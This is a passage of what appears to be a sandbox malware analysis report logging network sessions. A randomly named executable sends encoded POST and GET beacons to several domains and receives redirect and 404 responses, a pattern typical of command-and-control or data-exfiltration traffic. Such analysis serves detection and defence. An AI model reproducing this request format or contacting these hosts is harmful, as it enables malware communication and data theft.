9rvL8Zo6w [TRUNCATED]
                                  May 23, 2024 15:22:17.539033890 CEST427INHTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:22:17 GMT
                                  Content-Type: text/html
                                  Content-Length: 162
                                  Connection: close
                                  Location: https://www.fruitique.co.uk/2oa4/
                                  Expires: Thu, 23 May 2024 13:42:17 GMT
                                  Cache-Control: max-age=1200
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  56192.168.2.649762212.227.172.253803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:20.382287025 CEST494OUTGET /2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs= HTTP/1.1
                                  Host: www.fruitique.co.uk
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:22:21.060877085 CEST591INHTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:22:20 GMT
                                  Content-Type: text/html
                                  Content-Length: 162
                                  Connection: close
                                  Location: https://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs=
                                  Expires: Thu, 23 May 2024 13:42:20 GMT
                                  Cache-Control: max-age=1200
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  57192.168.2.6497633.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:26.119154930 CEST745OUTPOST /klk7/ HTTP/1.1
                                  Host: www.isrninjas.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.isrninjas.com
                                  Referer: http://www.isrninjas.com/klk7/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 77 66 6e 55 43 33 79 78 50 66 31 5a 41 61 63 45 67 73 76 73 35 45 68 61 34 76 44 4d 76 37 73 45 5a 43 79 47 4a 58 30 7a 46 49 6a 30 64 39 72 4c 61 59 4b 2f 33 76 71 33 42 38 44 32 65 78 6b 71 76 32 49 32 43 62 53 72 4c 38 78 75 66 47 54 57 6e 49 2b 43 58 4b 63 6a 46 6e 4d 64 48 6d 44 43 49 63 4f 43 38 49 5a 79 52 41 57 35 57 59 76 33 71 38 70 4e 55 67 62 49 64 45 38 47 42 34 46 2f 4f 57 46 62 38 47 32 64 46 63 2f 63 30 6a 73 4f 71 6d 43 41 2b 2b 77 2b 6d 6b 4d 78 32 75 63 39 78 48 71 57 2f 57 50 35 79 33 58 7a 76 62 38 71 50 39 75 5a 4f 42 31 6b 51 5a 63 32 39 78 68 75 34 71 48 79 56 50 7a 2b 35 42 4c 51
                                  Data Ascii: FNPd=wfnUC3yxPf1ZAacEgsvs5Eha4vDMv7sEZCyGJX0zFIj0d9rLaYK/3vq3B8D2exkqv2I2CbSrL8xufGTWnI+CXKcjFnMdHmDCIcOC8IZyRAW5WYv3q8pNUgbIdE8GB4F/OWFb8G2dFc/c0jsOqmCA++w+mkMx2uc9xHqW/WP5y3Xzvb8qP9uZOB1kQZc29xhu4qHyVPz+5BLQ


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  58192.168.2.6497643.33.130.19080
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:29.725642920 CEST769OUTPOST /klk7/ HTTP/1.1
                                  Host: www.isrninjas.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.isrninjas.com
                                  Referer: http://www.isrninjas.com/klk7/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 77 66 6e 55 43 33 79 78 50 66 31 5a 41 36 4d 45 6c 4c 62 73 31 30 68 5a 6b 2f 44 4d 30 72 73 49 5a 43 2b 47 4a 58 64 6f 46 39 37 30 64 63 62 4c 62 5a 4b 2f 36 50 71 33 5a 73 44 33 47 52 6c 6d 76 32 46 56 43 5a 57 72 4c 38 31 75 66 45 37 57 6e 2f 4b 42 52 4b 63 68 63 33 4d 66 4b 47 44 43 49 63 4f 43 38 49 4e 55 52 41 4f 35 56 6f 66 33 72 65 52 4f 4c 51 62 4c 61 45 38 47 46 34 46 37 4f 57 45 4f 38 48 71 37 46 66 48 63 30 69 63 4f 71 33 43 50 70 75 77 38 34 55 4e 6b 77 4e 4e 59 33 6b 6a 57 78 58 37 62 71 48 58 44 6e 4e 39 77 54 4f 75 36 63 52 56 6d 51 62 45 45 39 52 68 45 36 71 2f 79 48 59 2f 5a 32 31 75 7a 42 57 44 79 36 73 32 47 6f 69 50 55 45 65 55 6b 68 74 51 61 2b 51 3d 3d
                                  Data Ascii: FNPd=wfnUC3yxPf1ZA6MElLbs10hZk/DM0rsIZC+GJXdoF970dcbLbZK/6Pq3ZsD3GRlmv2FVCZWrL81ufE7Wn/KBRKchc3MfKGDCIcOC8INURAO5Vof3reROLQbLaE8GF4F7OWEO8Hq7FfHc0icOq3CPpuw84UNkwNNY3kjWxX7bqHXDnN9wTOu6cRVmQbEE9RhE6q/yHY/Z21uzBWDy6s2GoiPUEeUkhtQa+Q==


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  59192.168.2.6497653.33.130.19080
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:32.260241985 CEST1782OUTPOST /klk7/ HTTP/1.1
                                  Host: www.isrninjas.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.isrninjas.com
                                  Referer: http://www.isrninjas.com/klk7/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 77 66 6e 55 43 33 79 78 50 66 31 5a 41 36 4d 45 6c 4c 62 73 31 30 68 5a 6b 2f 44 4d 30 72 73 49 5a 43 2b 47 4a 58 64 6f 46 39 7a 30 64 4f 6a 4c 55 61 69 2f 37 50 71 33 48 38 44 79 47 52 6c 72 76 31 31 4a 43 5a 61 37 4c 2b 39 75 66 6e 44 57 68 4f 4b 42 43 71 63 68 42 6e 4d 53 48 6d 43 57 49 64 2b 47 38 49 64 55 52 41 4f 35 56 72 48 33 72 4d 70 4f 51 51 62 49 64 45 38 4b 42 34 46 66 4f 57 4d 65 38 45 47 4e 51 2b 6e 63 36 69 4d 4f 6d 6c 61 50 71 4f 77 45 35 55 4d 6e 77 4e 42 4c 33 6b 50 77 78 58 50 39 71 41 58 44 78 73 49 78 43 2b 53 77 4b 69 35 78 4f 4b 77 50 2b 57 70 59 79 37 7a 70 47 4b 44 6d 2f 46 65 65 5a 32 7a 34 35 75 33 71 70 41 75 37 48 5a 6c 73 6e 59 35 54 74 4a 4d 61 45 4f 57 53 64 73 47 5a 6c 54 54 2f 6a 46 44 49 51 43 53 30 74 43 66 79 2f 2f 42 49 61 75 79 5a 46 64 4f 59 77 72 50 63 38 54 4f 70 50 4c 4d 74 31 6a 74 7a 50 67 5a 4d 37 78 77 47 58 6a 56 51 6d 61 4b 36 47 45 63 4f 49 48 34 31 6d 71 30 39 47 41 36 44 44 30 5a 43 63 58 6f 36 65 6c 37 54 62 2b 47 2f 6c 51 66 5a 37 [TRUNCATED]
                                  Data Ascii: FNPd=wfnUC3yxPf1ZA6MElLbs10hZk/DM0rsIZC+GJXdoF9z0dOjLUai/7Pq3H8DyGRlrv11JCZa7L+9ufnDWhOKBCqchBnMSHmCWId+G8IdURAO5VrH3rMpOQQbIdE8KB4FfOWMe8EGNQ+nc6iMOmlaPqOwE5UMnwNBL3kPwxXP9qAXDxsIxC+SwKi5xOKwP+WpYy7zpGKDm/FeeZ2z45u3qpAu7HZlsnY5TtJMaEOWSdsGZlTT/jFDIQCS0tCfy//BIauyZFdOYwrPc8TOpPLMt1jtzPgZM7xwGXjVQmaK6GEcOIH41mq09GA6DD0ZCcXo6el7Tb+G/lQfZ7DryhkHW9MD6bEGBxbupwRAgkyotTcKi4W7waenWNNbB/shUBF1MRxJZM6f1uvpEcZizpCj/ri+CmohAZAaPCKLlqFeAijaJlY3oNmpEqYbktKdzQFND1LBlSOZ+7XYdkT+kPO6tmGOgbRFaUcthv50vJpn898URJxZpy8HEKZC4Kry/W6rQ3oi+dunYvjXdwdWh9YIPiIrD554Ewbvim3QoAGQ9eilg/IWXbLK43ZyUxMpeLoHxJGVCGc3qyP6PU82uZIR52CaymuKC1QBmnO/gJ0HiZUAVfGMrYclmnB+HDPRHuj+kDxN2zazYI22MCMNo0KoUs2BEyGEponIOYBxe+bxpRs8VpWMIexHn+31+KxhCw9J2ZuA1rURAWvx4xQa126rtcrgRXGBq+ls83CUmXZXWQXp2fe1x1Bn/c2+2rhoSmUjdi8KEzG4GmRQWYTq90sDig8p+uvgSJ7m4P1pATg1Kq+LTKEBlFd1A5BXi2o03q9nt5vWQyFLBmyjLwFWr4OTRk38856GLVGv+HVlF5+MQx2Exr4xrikmjHmleTuTVpRQUFneMzrWBmAqlTd42xW6AP3yE79ffPEItuuzY+btTzZdaQX3DSmJtiR71/ZeRm4hOIDqTSnZRTtUFVCUyf0Q3u937iL/6gtYMqvZK1qQO8T+QaQO [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  60192.168.2.6497663.33.130.19080
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:34.789547920 CEST492OUTGET /klk7/?FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.isrninjas.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:22:35.285506964 CEST418INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Thu, 23 May 2024 13:22:35 GMT
                                  Content-Type: text/html
                                  Content-Length: 278
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 4e 50 64 3d 39 64 50 30 42 44 65 51 4f 65 49 67 55 74 77 48 69 73 62 34 2b 48 68 72 69 75 75 43 37 61 46 62 54 69 4b 65 41 45 64 71 4c 34 66 4a 4d 37 71 49 63 66 54 33 78 73 65 72 4e 72 2f 36 49 42 68 58 6d 44 63 30 53 65 2b 67 49 4b 4d 72 57 57 6e 36 6f 74 47 42 4a 70 59 4d 64 55 63 68 44 56 47 32 4d 63 61 63 32 35 6b 6f 62 6a 32 67 57 35 61 4a 6f 39 4a 76 66 53 37 49 41 30 63 68 4f 5a 56 73 45 30 41 77 78 52 34 3d 26 7a 64 4b 30 64 3d 4d 38 6d 54 5a 30 78 48 4e 64 31 64 50 56 6d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm"}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  61192.168.2.64976769.57.162.2480
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:43.353050947 CEST500OUTGET /88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:22:43.935703039 CEST1236INHTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Thu, 23 May 2024 13:22:43 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                  May 23, 2024 15:22:43.940427065 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  62192.168.2.649768162.240.81.1880
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:48.963737965 CEST754OUTPOST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 63 6e 43 69 64 73 53 6c 50 4e 31 68 46 6e 64 39 34 6f 57 59 54 71 34 78 58 2f 78 34 55 5a 43 6b 6f 2f 37 38 6d 72 33 49 6f 2b 56 73 63 6e 35 62 62 46 69 54 43 77 39 38 54 39 67 55 34 78 55 42 2b 45 37 79 71 4d 34 51 56 73 4a 4d 76 62 74 2b 30 45 35 79 6e 49 77 38 63 43 51 35 68 77 6f 63 6e 6b 61 39 53 53 41 6b 6a 6e 45 54 77 56 32 7a 52 77 4f 4d 47 67 57 41 63 73 35 51 33 74 6a 38 61 4d 2b 78 5a 6e 35 4c 6f 52 4a 78 67 41 6c 58 61 47 45 31 4d 59 34 62 56 71 4d 6e 53 72 49 43 46 41 34 57 72 33 34 67 72 6d 39 77 4b 42 44 6b 77 68 77 76 69 55 31 7a 4e 6e 4b 72 62 4b 42
                                  Data Ascii: FNPd=nhZ5J1hcIHrKYcnCidsSlPN1hFnd94oWYTq4xX/x4UZCko/78mr3Io+Vscn5bbFiTCw98T9gU4xUB+E7yqM4QVsJMvbt+0E5ynIw8cCQ5hwocnka9SSAkjnETwV2zRwOMGgWAcs5Q3tj8aM+xZn5LoRJxgAlXaGE1MY4bVqMnSrICFA4Wr34grm9wKBDkwhwviU1zNnKrbKB
                                  May 23, 2024 15:22:49.568794012 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:22:49 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:22:49.570089102 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                  May 23, 2024 15:22:49.573481083 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                  Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                  May 23, 2024 15:22:49.573517084 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                  Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  63192.168.2.649769162.240.81.1880
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:22:51.493680954 CEST778OUTPOST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 38 58 43 67 2b 55 53 70 2f 4e 71 75 6c 6e 64 6f 49 70 66 59 54 75 34 78 53 66 68 34 6d 4e 43 71 74 44 37 39 6e 72 33 4c 6f 2b 56 6a 38 6d 79 56 37 46 70 54 43 39 41 38 57 56 67 55 38 5a 55 42 36 49 37 79 62 4d 37 52 46 73 78 48 50 62 6a 77 55 45 35 79 6e 49 77 38 63 57 70 35 69 41 6f 63 58 55 61 76 6d 2b 44 74 44 6e 46 51 77 56 32 33 52 77 4b 4d 47 67 34 41 64 77 54 51 78 70 6a 38 59 6b 2b 79 49 6e 6d 46 59 51 41 2f 41 42 78 47 61 71 50 73 2f 74 46 46 55 65 30 78 78 54 79 48 7a 42 69 4b 59 33 62 79 37 47 2f 77 49 5a 78 6b 51 68 61 74 69 73 31 68 61 72 74 6b 76 76 69 6c 36 34 58 46 66 67 6b 51 4c 32 53 76 6b 6a 37 6f 6c 63 63 39 41 3d 3d
                                  Data Ascii: FNPd=nhZ5J1hcIHrKY8XCg+USp/NqulndoIpfYTu4xSfh4mNCqtD79nr3Lo+Vj8myV7FpTC9A8WVgU8ZUB6I7ybM7RFsxHPbjwUE5ynIw8cWp5iAocXUavm+DtDnFQwV23RwKMGg4AdwTQxpj8Yk+yInmFYQA/ABxGaqPs/tFFUe0xxTyHzBiKY3by7G/wIZxkQhatis1hartkvvil64XFfgkQL2Svkj7olcc9A==
                                  May 23, 2024 15:22:52.053009033 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:22:51 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
